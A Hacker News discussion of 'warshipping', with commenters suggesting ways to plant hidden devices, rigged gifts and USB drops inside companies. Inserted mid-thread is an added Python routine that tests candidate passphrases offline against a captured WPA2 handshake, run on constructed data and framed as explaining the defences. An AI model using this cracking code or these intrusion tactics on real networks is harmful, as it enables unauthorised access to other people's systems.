
Hackers ship their exploits directly to their target’s mailroom - lordqwerty
https://techcrunch.com/2019/08/06/warshipping-hackers-ship-exploits-mail-room/
======
fortran77
Find someone who's out on leave for a while (just look for who's having a baby
on IG) and ship the package to him/her! They won't discover it for weeks and
you'll have plenty of time for your package to sit in the mailroom or on
someone's desk. The danger is when the package is opened, the company may
realize they've been hacked.

Or have it there permanently: Ship an executive a fancy illuminated globe or
desk clock from the local "Chamber of Commerce". Put a camera and mic in there
too to try to get passwords via audio or video surveillance. (Audio recordings
of keyboards typing can be surprisingly effective if you have a big enough
training set)

(On my way to DEFCON! See you all there!)

~~~
hinkley
One of the first pen testers I ever read pointed out that companies do
(sometimes excessive) background checks on their staff all the time and then
they outsource the cleaning crew. When I'm there during the day, there's only
so much I could do without other people noticing. But here's a group with full
access to an empty building full of your equipment for 10 hours a day.

People are going to come at you from your blindside, if they can find it. And
if you consider a certain class of people invisible, then that's what a hacker
wants to be.

~~~
zcrackerz
I once stayed late and noticed a cleaner was wearing a polo from the company I
used to work for. I asked him about it and it turned out he was an engineer
and was filling in for his girlfriend who owned the cleaning business. Holy
red flag! I made some noise and that cleaning company was let go.

~~~
PhasmaFelis
I'm not sure I see why the cleaning company was the problem.

~~~
perl4ever
"his girlfriend who owned the cleaning business"

He wasn't just some guy.

~~~
PhasmaFelis
He was working for the cleaning business, though. If the company was letting
in anyone who works for that cleaner without further investigation, that's
their problem. That's the situation we were talking about upthread, so I
assumed zcrackerz would have said something if it were different.

~~~
lazyasciiart
Where I work, each cleaner gets a badge, just like the engineers. Presumably
she gave her badge to a random other person, aka her boyfriend, so he could
let himself in. Nothing stops me from doing that as an engineer either, but it
would absolutely be a firing offence if caught.

------
el_benhameen
Seems like doing this with a rooted phone would be even sneakier. You've got
everything you need built in: battery, modem, etc. When it eventually does get
opened, the mailroom person is going to think "oh someone ordered a phone"
instead of "holy shit, this bunch of wires and circuit boards is maybe a bomb
and definitely something I should tell the police about".

~~~
cronix
IDK. If they put it in a stuffed animal like the pic in the article, how many
would rip it open to see what's inside?

~~~
acid_burn
But what is more suspicious - a phone nobody ordered or (in the worst case of
discovery) a stuffed animal nobody ordered with custom electronics in it?

~~~
yjftsjthsd-h
Just disguise your electronics to look like a voice box. Heck, you could even
make it functional; microphone, speaker, and a tiny bit of software would make
a convincing toy.

~~~
badwolf
The Furby scare is back!

------
ChuckMcM
One of my favorite security stories came from a well known security researcher
who was asked to try to penetrate the computer system of a national research
lab. On the day of the test he came in and logged in using his own credentials
and had full system access, leaving everyone in the room stunned.

The system was made by DEC, and DEC had the process of sending software updates
by magnetic tape. This researcher had made a follow-up meeting request and
brought with them a tape that looked exactly like an update tape, with label
and all the trimmings. Further, they dropped it onto a mail delivery cart that
was already through the 'verify the mail' process. As a result the tape got
delivered to the operators, they mounted it and installed the "updates." Of
course that created an account the pentester used to log in.

Caught the customer by surprise, of course; nobody likes to be surprised by the
pentesters, but it is always a good thing to have them find something rather
than be penetrated.

The story (which has clearly stuck with me for a long time) left me with an
appreciation for looking at things which aren't normally considered "part of
the IT infrastructure" as part of the attack surface that needs to be
protected.

~~~
2sk21
Interesting - I too heard this story from Paul Karger (a noted security
expert, sadly deceased). Paul's office was next to mine at IBM research and by
talking to him, I realized I lacked the necessary level of paranoia to ever
become a security expert :-)

------
ga-vu
Source, without all the TechCrunch "OMG Hackers" stuff:

[https://securityintelligence.com/posts/package-delivery-cybercriminals-at-your-doorstep/](https://securityintelligence.com/posts/package-delivery-cybercriminals-at-your-doorstep/)

Do everyone a favor, mister mod.

~~~
vntok
No thank you. The TC article is both entertaining and factual.

------
gabrielblack
Why should an attacker spend $100 sending hardware to the target that could
potentially be tracked along the path between the resellers, could carry
evidence like fingerprints or DNA, using a _telephone connection_ that could
also be tracked, when the same thing could be done with good radio equipment
and more discretion? Anyway, I am the kind of guy that inspects the ATM praying
to find a skimmer to dissect, so if someone would send me all that cool stuff
directly at home, it is welcome!

Moreover: battery. How long could a battery of reasonable dimensions survive
powering that kind of system? Exaggerating, 3 days without heavy use of the
phone modem? But let's say that in that time the attacker reaches the target,
collecting WiFi keys; that doesn't mean that he can compromise any PC or phone
in the home network. So my advice is to send compromised networking hardware
directly (i.e. an access point) and, if your budget is $100, you can send a
very nice piece of hardware to the target, avoiding that he throws all that
stuff away (if he can't recycle it all like me). Again, if someone could send
me a free, $100 worth AP, it is welcome.

~~~
core-questions
Think about the distance factor. Sure, you could get good radio stuff set up
so that you don't have to be in the parking lot to break in and can avoid
appearing suspicious on any surveillance cameras, but you still have to be
within a few kilometers at most. With warshipping you can be across the
planet.

~~~
austinheap
Having done a handful of red teams our last concern was security cameras since
most times no one looks at security footage until they’re already compromised.

~~~
throwaway_391
Yeah but 'APTs' are generally shitty low end numbers-game attacks that target
HR with terrible macro based malware to breach company perimeters.

Unless you're emulating nation state actors, your ideology of a 'red team'
which focuses on physical access is a disservice to your client and your
industry.

------
jason0597
>Once the warship locates a Wi-Fi network from the mail room or the
recipient’s desk, it listens for wireless data packets it can use to break
into the network. The warship listens for a handshake — the process of
authorizing a user to log onto the Wi-Fi network — then sends that scrambled
data over the cellular network back to the attacker’s servers, which has far
more processing power to crack the hash into a readable Wi-Fi password.

Breaking a hash to obtain the Wi-Fi password? Surely this is impossible?

~~~
Fabricio20
Not really, this is a known "vulnerability" with WPA2 and has been
demonstrated to work a lot of times.

[https://www.aircrack-ng.org/doku.php?id=cracking_wpa#step_4_-_run_aircrack-ng_to_crack_the_pre-shared_key](https://www.aircrack-ng.org/doku.php?id=cracking_wpa#step_4_-_run_aircrack-ng_to_crack_the_pre-shared_key)

This is done completely offline once you have the handshake captured and can
be easily scaled.
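To make concrete why the captured handshake can be checked offline (and why only passphrase entropy protects a WPA2-PSK network), here is an added illustration, not code from the thread or from aircrack-ng: it derives the PMK and KCK from a candidate passphrase exactly as IEEE 802.11i specifies and compares the resulting EAPOL MIC against a captured one. The SSID, MAC addresses, nonces, EAPOL bytes and candidate list are all constructed for this example.

```python
import hashlib
import hmac

# All handshake material below is constructed for this example; nothing here
# was captured from a real network.
SSID = "example-corp-wifi"
AP_MAC = bytes.fromhex("020000000001")
STA_MAC = bytes.fromhex("020000000002")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# Second EAPOL-Key frame of the handshake with its 16-byte MIC field zeroed,
# which is what the verifier authenticates. Contents are arbitrary test bytes.
EAPOL_MIC_ZEROED = b"\x02\x03\x00\x75\x02\x01\x0a\x00" + bytes(32) + SNONCE + bytes(40)
CANDIDATES = ["password", "letmein", "corpwifi2019", "correct horse battery staple"]


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    # 802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    # This fixed cost per guess is the only thing slowing an offline attacker down.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    # 802.11i PRF-512: four HMAC-SHA1 blocks over label || 0x00 || data || counter.
    out = b""
    for i in range(4):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def kck_from_handshake(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                       anonce: bytes, snonce: bytes) -> bytes:
    # PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(N)||max(N)).
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = prf_512(pmk, b"Pairwise key expansion", data)
    return ptk[:16]  # KCK: the part of the PTK that authenticates EAPOL-Key frames


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    # Key descriptor version 2 (AES/CCMP): MIC = HMAC-SHA1(KCK, frame) truncated to 16 bytes.
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def recover_passphrase(candidates, ssid, ap_mac, sta_mac, anonce, snonce,
                       eapol_mic_zeroed, captured_mic):
    # Every step uses only values visible in the captured handshake, so the
    # check needs no further contact with the network.
    for cand in candidates:
        kck = kck_from_handshake(pmk_from_passphrase(cand, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol_mic_zeroed), captured_mic):
            return cand
    return None


def build_captured_mic(true_passphrase: str) -> bytes:
    # Stand-in for the MIC an access point's client would have sent; constructed here.
    kck = kck_from_handshake(pmk_from_passphrase(true_passphrase, SSID),
                             AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_mic(kck, EAPOL_MIC_ZEROED)


if __name__ == "__main__":
    mic = build_captured_mic("correct horse battery staple")
    print("matching candidate:", recover_passphrase(
        CANDIDATES, SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, EAPOL_MIC_ZEROED, mic))
```

The check succeeds only when the passphrase is in the candidate list, which is why a long random PSK, 802.1X/EAP authentication, or WPA3-SAE (whose handshake does not expose a dictionary-checkable value) are the defences, not keeping the signal inside the building.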

~~~
austinheap
When I’ve been hired to do red teams we always use giant antennas and find a
nice parking lot a few blocks away to capture the necessary handshakes. This
works great even in downtown SF where the RF interference is absurd.

~~~
munk-a
Yea, this ^. This attack approach is interesting, but any company that's
serious about security needs to realize that anything opened up on wifi is a
big hole. This used to be more amusingly exploited by war-driving: just
driving around a neighborhood looking for someone with an open network that
spills out into the street so you could download the latest episode of
Friends.

I don't work in this sort of security and it seems terrifying, the social
engineering side is especially crazy.

~~~
zeta0134
I used to do this as a kid in rural Texas, when we could only afford dial-up
at the house and my parents didn't let me on the network very often. Good
times! I'm terrified of the prospect now, but back then I really appreciated
all my neighbors who ran unsecured wireless networks named "linksys".

------
Zhenya
If your network security relies on proximity for ultimate security, you've
done something very wrong.

~~~
sathackr
Yep. You can do the same thing sitting outside on the street with a high gain
antenna. Or one of the many rarely updated, vulnerability-ridden Android
phones that are inside the building in people's pockets.

~~~
berkes
The difference being that you can send multiple packages all over the globe
for reasonably cheap.

But you cannot ship yourself to said parking lots that fast, that cheap, and
never in parallel.

------
CPLX
This makes me think of an even more straightforward attack. How hard would it
be to actually just ship them computer hardware and hope it makes it into the
system?

I mean, if a package that looks like it came from NewEgg containing a router
shows up, especially if it matches the type the company usually uses, which
wouldn't be too hard to figure out, what are the chances it just gets tossed
on a shelf to be used next time one is needed? Or do companies have
sophisticated controls in place for something like that?

~~~
gowld
It's the opposite -- companies lack sophisticated controls, and without impetus
they'd just never get the item into the right place to use the item.

Maybe if you shipped it at the same time someone was expecting it, you could
get it to someone who knew what to do with it. Or ship it to the newegg/amazon
warehouse to get mixed in with regular deliveries.

------
mikece
Add one more item to the list of things to keep the Chief Security Officer up
at night... though I've got to imagine this type of attack is at least a
decade old even if it's only becoming well known right now. I've got to wonder
if spear-phishers have been able to combine this type of attack with getting
someone at a company to buy/accept and plug in some type of electronic novelty
device...

~~~
magashna
Why even bother with a novelty? Send some USBs or even drop a few outside the
building. Curiosity is a massive vulnerability

~~~
Phillips126
I work close to IT (being software) for a company ~400 people. We were doing a
security audit and this is one of the things they tested. USB's were loaded up
with curious sounding files that when opened alerted our IT department. It was
shocking how many people picked up and used these random USB's they found
laying around.

~~~
astura
>curious sounding files

You left out the good part, what sort of file names did you use?

~~~
istjohn
settlement_proposal.docx 2019-05-25_bachelor-party.mov
GAME_OF_THRONES_S1E06.mp4 salaries.xlsx

------
Theodores
IBM have a service to sell. Hence this 'fear'.

Real world attacks using this method?

Show me one.

It is like putting superglue in locks. In theory anyone could invest in $5 of
superglue and put a large building out of business for a few hours. It doesn't
happen. But if you were an IBM type of company you could offer this as a
service to companies wanting to test their contingency plans. Seems that is
what is going on here.

~~~
gvb
Agreed: this is an IBM "offensive operations unit" publicity piece. Key items
from TFA:

* TFA quotes Charles Henderson, " _who heads up the IBM offensive operations unit._ "

* "This newly _named_ technique — dubbed “warshipping” — is not a new concept."

* "All of this could be done covertly without anyone noticing — _so long as nobody opens the parcel._ "

A _much_ more practical implementation of this attack vector is the "Malicious
Raspberry Pi Power Strip" (article posted in 2012):
[https://hackaday.com/2012/10/04/malicious-raspberry-pi-power-strip-looks-a-bit-scary/](https://hackaday.com/2012/10/04/malicious-raspberry-pi-power-strip-looks-a-bit-scary/)
Those could easily be shipped to end users who would be
pretty likely to plug it in. Add a note in the box "from" the IT department
and I bet it gets a very high percentage success rate.

~~~
rhcom2
That hackaday article has a great comment at the bottom

> One time I had a colony of ants build up inside an APC UPS. Every day, the
> system would make a little popping sound, then switch to battery inversion
> for about two seconds, then switch back to mains. For the longest time I was
> baffled.

> Then one day I noticed some ants making a trail and investigated. It was
> crazy how many ants were living inside it. Apparently, every once in a while
> an ant would come too close to crossing the AC wires and the power would
> short through it, killing the ant instantly and causing the protection
> circuit to put it on battery.

> I find myself wondering if a similar ant infestation would destroy the
> RasPi.

~~~
croh
Haha

------
ojosilva
The WiFi network is an interesting attack vector, although I've seen lots of
places that don't have wifi setup with direct internal network access, only
for internet access. That could limit the effectiveness of the _warship_
somewhat.

When I started the article, the first thing that came to me was that, once that
package actually arrived at someone's desk, the main goal of the attackers
would be to exploit Bluetooth attack vectors, where you can actually snoop on
user/passwords, take control of devices or even plug the warship in as a
keyboard and deploy malicious code into the internal PCs.

For some of the bluetooth attack vectors, the warship wouldn't even need the
cell network access and a call home, just a powerful bluetooth antenna should
suffice.

~~~
Bartweiss
Presumably WiFi hijacking would get you access to a lot of systems at a lot of
places, but it does seem like the most intriguing targets (and those most
hardened against other attacks) are least likely to be susceptible.

But now I wonder how many other attacks can be launched from a sealed box in a
mailroom. Van Eck phreaking will get you a decent image off an LCD monitor
from 10+ meters away through multiple interior walls, and can survive
significant channel noise. Other side-channel attacks can directly pick up
keys during decryption, though the proofs are short-range and it's not clear
whether increasing device size/power would boost that.

It'd be tricky and expensive to arrange, especially with the risk of ending up
pointed in a boring direction. But it seems like an absolutely wild idea for
remote access to the contents of even air-gapped monitors.

~~~
vardump
Right. Or just ship a free, already compromised monitor. A free 32-inch 4K
monitor could quickly find itself attached to pretty interesting places.

24/7 power, a platform to mount attacks via Bluetooth, WiFi, microphone,
integrated USB hub, and heck, aren't the new monitors often attached to
Thunderbolt, which is almost the same as PCIe. And even in case it's not
Thunderbolt, it's likely going to be USB-C — not too shabby for evil keyboard
emulation, memory sticks, fake ethernet adapters etc.

Perfect visibility to keyboards as well.

3G for return channel.

------
tyingq
Throwing USB sticks on the ground seems to work well also.
[https://www.wired.com/2011/06/the-dropped-drive-hack/](https://www.wired.com/2011/06/the-dropped-drive-hack/)

------
gist
> The researchers developed a proof-of-concept device — the warship, which has
> a similar size to a small phone — into a package and dropped it off in the
> mail. The device, which cost about $100 to build, was equipped with a
> 3G-enabled modem, allowing it to be remote-controlled so long as it had cell
> service. With its onboard wireless chip, the device would periodically scan
> for nearby networks — like most laptops do when they’re switched on — to
> track the location of the device in its parcel.

This is beyond belief to me and an example of why there are more security
breaches than would happen if everyone out there (security researchers in
particular, ironically) wasn't eager for the glory of discovering an exploit
that very well might have taken years to uncover, if at all.

So they come up with an idea, create a proof of concept, then they publicize
it so that actual hackers can be turned on to a new idea, under the guise that
they are going to prevent a problem so that people can protect against it.

> “If we can educate a company about an attack vector like this, it
> dramatically reduces the likelihood of the success of it by criminals,”
> Henderson said.

Like all the other similar 'research' it completely ignores that it is also
educating people who will now know of the exploit and it will give them ideas
on what can be done.

~~~
VikingCoder
We're in a predator-prey relationship. And the stakes are enormous. You can
bet something like this actually has been done in the wild before. In fact,
governments do things like this regularly. The only question is if it's worth
your effort to protect yourself from it.

------
slowmotiony
That seems like a lot of hassle and a pretty big federal crime for only being
able to attack Wi-Fi networks. Why not just park your car outside and use a
laptop?

~~~
mikece
How long can you sit outside a company running Kali Linux and a high gain
antenna array before you attract attention? If you ship someone on the DevOps
team a WiFi-connected plush toy that listens for webhooks from your CI/CD
platform to make happy/sad noises when the build passes/fails -- AND THEY PLUG
IT IN AND LEAVE IT ON -- then the ability to have passive access to the
network for a long period of time will be less noticed.

The example of the WiFi connected stuffed animal listening for webhooks isn't
a made-up example -- I read a blog post about that years ago. Some team had a
"build bunny" whose ears perked up and made happy noises when the build passed
and the ears drooped and made a sad trombone noise when builds failed. The
thing is already RF-active... would anyone break out a spectrum analyzer to
notice if the thing was also transmitting/receiving on LTE and not just WiFi?

~~~
heavenlyblue
But this device won't work for more than a few days anyway.

~~~
lb1lf
Just piggyback it onto something the recipient would want to plug in. Problem
solved.

------
astura
Am I missing something, or does this depend on the company having a WiFi
network that's connected to the company's normal internal network and whose
only authentication is a somewhat insecure WiFi password?

Because I would think that's a very uncommon case, everywhere I've worked
either didn't have WiFi or the WiFi was a completely external network.

~~~
rst
There are companies with offices that have no Ethernet wiring, where WiFi is
the _only_ network. Some of them write software. (The last time $DAYJOB was
office-shopping, there was one candidate space then occupied by, I think, a
games developer which ran exclusively on WiFi; the cost and time required to
wire the place up was one reason we wound up going elsewhere.)

------
hsnewman
This seems to be more self-aggrandizement than something new. Like several
have said, you can buy an off-the-shelf cell phone and do this with some code.
This attack is only on wifi, and most companies don't place confidential or
enterprise systems on wifi. Yes, there are exceptions, but just pulling up to
the side of a building would probably give you the same access to their wifi.

------
SamuelAdams
This could be really fun for people who live in apartment complexes. Break
your neighbor's wifi by using this little, no-fuss box.

You could probably make a killing selling these for $100 - 200 on Etsy or
something.

~~~
heavenlyblue
Only the main question remains: why do you need this if you could simply crack
your neighbour's wifi by using a high-gain antenna hidden behind the walls of
your own flat?

~~~
SamuelAdams
This comment reminds me of the initial response to Dropbox [1]. Sure, you or
I, a very technical group, could set this up manually. But I was suggesting
you manufacture, or put together, a very simple box. The idea is this would be
easy for non-technical people to get their wifi. Basically, plug in this box
and in 30 days you will have your neighbor's wifi password.

[1]:
[https://news.ycombinator.com/item?id=8863](https://news.ycombinator.com/item?id=8863)

~~~
heavenlyblue
Nah. You don't get it, still.

What I am asking is: how is this device better than another (user-friendly,
packaged) device that can work from your own flat? Moreover, selling that
device with a high-gain antenna isn't any more against user-friendliness than
selling a few boards you're supposed to hide yourself.

Sending a device to your neighbour is essentially a liability. A liability
that, compared to simply listening to the traffic of your neighbour, can
easily give the enforcement agencies enough material to lock you up.

The truth is that hiding the same device inside something else should be done
by the user, because the moment you start putting those into a specific model
of a plush bear, the picture of that plush bear will immediately appear in
security advisories.

------
ohnope
Could you look at the wireless MAC, contact the manufacturer, figure out where
it was sold, contact the seller, and ask for sales records?

Guess it wouldn't prevent people from buying on craigslist.

~~~
ac29
MAC addresses are trivially configurable in software.

Even if they weren't, it's easy enough to buy random $5 wifi-enabled dev boards
from Aliexpress or somewhere similar, where detailed records tracing
individual boards from manufacturer -> distributor -> reseller -> user are
highly unlikely to exist.

------
Crontab
Mailing a bunch of "free" and "promotional" USB drives, prepared with zero-day
malware, would probably work too. Especially if it was official looking.

~~~
throwaway_391
zero-day malware probably makes malware writing sound difficult. Bypassing
fingerprint-based scanners is reasonably easy with the use of 'packers' (which
can be bought from hacker markets for pretty cheap, or built pretty easily).
Bypassing heuristic based scanners is a little more research-intensive[1], but
some 'packers' do this too.

[https://wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf](https://wikileaks.org/ciav7p1/cms/files/BypassAVDynamics.pdf)

------
thinkloop
This is to break into wifi that doesn't leak outside the building?

------
iamnotacrook
Less effort to just ship a mobile phone there I'd imagine.

------
algaeontoast
Love to see Adafruit parts in real-world payloads!!!

------
zitterbewegung
I had an idea to do exactly this but I never did it

~~~
lb1lf
Careful. The Norwegian postal service almost ripped me a new one for having
the gall to ship a microcontroller, a thermometer and a couple of
accelerometers to myself; apparently, buried somewhere deep in some regulation
is the fact that shipping live datalogging equipment is a big no-no. Their
legal department assured me this was par for the course for UPI (International
Postal Union) member countries.

Among the observations I made was that the tallest drop a package had to
endure going through the sorting machine in Trondheim was 62cm (2ft).

~~~
icedchai
How did they discover you were shipping that stuff?

~~~
lb1lf
I stupidly thought they'd find the idea amusing, so I sent them a copy of the
write-up I did afterwards. (School project.)

They were not amused.

